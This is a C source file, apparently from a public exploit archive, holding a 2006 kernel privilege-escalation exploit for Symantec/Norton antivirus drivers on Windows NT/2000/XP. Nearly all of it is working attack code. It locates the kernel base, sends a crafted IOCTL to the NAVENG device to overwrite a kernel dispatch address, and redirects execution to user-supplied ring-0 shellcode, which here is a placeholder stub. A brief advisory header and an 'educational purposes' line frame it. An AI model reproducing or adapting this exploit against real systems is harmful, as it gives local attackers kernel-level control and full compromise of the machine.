189 lines
No EOL
4.6 KiB
C
189 lines
No EOL
4.6 KiB
C
/*
|
||
source: https://www.securityfocus.com/bid/20360/info
|
||
|
||
Symantec AntiVirus is prone to a privilege-escalation vulnerability.
|
||
|
||
Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise.
|
||
|
||
This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP.
|
||
*/
|
||
|
||
////////////////////////////////////
|
||
///// Norton Internet Security
|
||
////////////////////////////////////
|
||
//// For educational purposes ONLY
|
||
////
|
||
//// Kernel Privilege Escalation #1
|
||
//// Exploit
|
||
//// Rub<75>n Santamarta
|
||
//// www.reversemode.com
|
||
//// 26/08/2006
|
||
////
|
||
////////////////////////////////////
|
||
|
||
|
||
|
||
#include <windows.h>
|
||
#include <stdio.h>
|
||
|
||
#define WXP_SWITCH 0xA5522
|
||
#define W2K_SWITCH 0x91531
|
||
|
||
typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
|
||
DWORD ,
|
||
LPDWORD);
|
||
|
||
typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
|
||
LPTSTR lpBaseName,
|
||
DWORD nSize);
|
||
|
||
|
||
VOID ShowError()
|
||
{
|
||
LPVOID lpMsgBuf;
|
||
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
|
||
NULL,
|
||
GetLastError(),
|
||
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
|
||
(LPTSTR) &lpMsgBuf,
|
||
0,
|
||
NULL);
|
||
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
|
||
exit(1);
|
||
}
|
||
|
||
int main(int argc, char *argv[])
|
||
{
|
||
|
||
DWORD *OutBuff,*InBuff,*ShellAddr;
|
||
DWORD dwIOCTL,OutSize,InSize,junk,cb,devNum,i,Ring0Addr;
|
||
HANDLE hDevice;
|
||
PENUMDEVICES pEnumDeviceDrivers;
|
||
PGETDEVNAME pGetDeviceDriverBaseName;
|
||
LPVOID arrMods[200],addEx;
|
||
DWORD BaseNt=0,BaseAuxNt;
|
||
BOOL InXP;
|
||
CHAR baseName[MAX_PATH];
|
||
|
||
//"PUT YOUR RING0 CODE HERE "
|
||
unsigned char Ring0ShellCode[]="\xcc\x90\x90\x90";
|
||
|
||
system("cls");
|
||
|
||
printf("\n################################\n");
|
||
printf("## Norton I.S ##\n");
|
||
printf("## Ring0 Exploit ##\n");
|
||
printf("################################\n");
|
||
printf("\nRuben Santamarta\nwww.reversemode.com\n\n");
|
||
|
||
if(argc<2)
|
||
{
|
||
|
||
|
||
printf("\nusage> exploit.exe <XP> or <2K>\n");
|
||
exit(1);
|
||
}
|
||
|
||
|
||
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
|
||
"EnumDeviceDrivers");
|
||
|
||
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
|
||
"GetDeviceDriverBaseNameA");
|
||
|
||
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
|
||
devNum=cb/sizeof(LPVOID);
|
||
printf("\n[!] Searching Ntoskrnl.exe Base Address...");
|
||
|
||
for(i=0;i<=devNum;i++)
|
||
{
|
||
pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH);
|
||
if((strncmp(baseName,"ntoskr",6)==0))
|
||
{
|
||
printf("[%x] Found!\n",arrMods[i]);
|
||
BaseNt = (DWORD)arrMods[i];
|
||
BaseAuxNt = BaseNt;
|
||
}
|
||
}
|
||
|
||
if (!BaseNt)
|
||
{
|
||
printf("!!? ntoskrnl.exe base address not found\nexiting\n\n");
|
||
exit(0);
|
||
}
|
||
|
||
|
||
//////////////////////
|
||
///// CASE 'DosDevice'
|
||
//////////////////////
|
||
|
||
hDevice = CreateFile("\\\\.\\NAVENG",
|
||
0,
|
||
0,
|
||
NULL,
|
||
3,
|
||
0,
|
||
0);
|
||
|
||
//////////////////////
|
||
///// INFO
|
||
//////////////////////
|
||
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
|
||
|
||
printf("\n\n** Initializing Exploit]\n\n");
|
||
printf("INFORMATION \n");
|
||
printf("-----------------------------------------------------\n");
|
||
printf("[!] NAVENG Device Handle [%x]\n",hDevice);
|
||
|
||
|
||
|
||
|
||
//////////////////////
|
||
///// IOCTL
|
||
//////////////////////
|
||
OutSize = 4;
|
||
dwIOCTL = 0x222AD3;
|
||
|
||
|
||
if(strncmp(argv[1],"XP",2)==0) Ring0Addr = BaseNt + WXP_SWITCH;
|
||
else Ring0Addr = BaseNt + W2K_SWITCH;
|
||
|
||
printf("[!] Overwriting NtQuerySystemInformation Switch at [0x%x]\n",Ring0Addr);
|
||
|
||
ShellAddr=(DWORD*)VirtualAlloc((LPVOID)0x2000000
|
||
,0xF000
|
||
,MEM_COMMIT|MEM_RESERVE
|
||
,PAGE_EXECUTE_READWRITE);
|
||
|
||
|
||
for(i=1;i<0x3C00;i++) ShellAddr[i]=(DWORD)ShellAddr; // paged out
|
||
memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode));
|
||
|
||
printf("\n\n\t\t[!] Initializing Countdown,last chance to abort.");
|
||
|
||
for(i=10;i>=1;i--)
|
||
{
|
||
printf("\r -[ %d ]- ",i);
|
||
if(i==1) printf("\n\n[*] Executing ShellCode");
|
||
Sleep(1000);
|
||
}
|
||
|
||
DeviceIoControl(hDevice,
|
||
dwIOCTL,
|
||
(LPVOID)0,0,
|
||
(LPVOID)Ring0Addr,OutSize,
|
||
&junk,
|
||
NULL);
|
||
|
||
system("dir"); // NtQuerySystemInformation Nasty Hack ;
|
||
|
||
/////////////////////
|
||
///// CLeanUp
|
||
/////////////////////
|
||
|
||
CloseHandle(hDevice);
|
||
free(ShellAddr);
|
||
|
||
printf("\n\n[*] Exploit terminated\n\n");
|
||
return 0;
|
||
} |